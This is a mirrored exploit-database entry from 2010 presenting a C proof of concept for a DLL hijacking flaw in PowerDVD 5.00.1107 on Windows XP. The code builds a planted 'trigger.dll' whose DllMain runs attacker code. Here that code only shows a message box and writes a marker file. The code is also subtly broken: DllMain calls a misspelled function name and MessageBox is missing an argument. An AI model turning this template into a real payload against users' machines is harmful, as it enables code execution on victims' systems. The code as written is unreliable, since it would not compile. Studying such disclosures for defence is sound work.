Lucene search
K

PowerDVD.exe 5.00.1107 DLL Hijacking Exploit

🗓️ 23 Oct 2010 00:00:00Reported by Inj3cti0n P4ck3tType 
zdt
 zdt
🔗 0day.today👁 23 Views

PowerDVD DLL Hijack Exploit 5.00.1107 on Windows X

Code
============================================
PowerDVD.exe 5.00.1107 DLL Hijacking Exploit
============================================

/*


[*] Author: Inj3cti0n P4ck3t					          				 

[*] e-mail: [email protected]					 				 

[*] Date: 18/10/2010	

[*] Name BUG: PowerDVD 5.00.1107 DLL Hijacking Exploit (trigger.dll)

[*] System tested: Windows XP (Version 5.1 Service Pack 3)

[*] PowerDVD.exe Version: 5.00.1107

[*] Software to Download: Nгo disponнvel

[*] Application Path: C:\Arquivos de programas\CyberLink\PowerDVD\PowerDVD.exe

[*] DLL Found => trigger.dll

Greetz: fvox


*/

#include <windows.h>
#include <stdio.h>

int testando()
{
    MessageBox(0, "Testando PoC", MB_OK);
    FILE *fp;
    fp = fopen("Inj3cti0nP4ck3t.txt", "w");
    fwrite("it works ;-)", 1, 12, fp);
    fclose(fp);
    exit(1);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
    testandp();
    return TRUE;
}



#  0day.today [2018-03-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation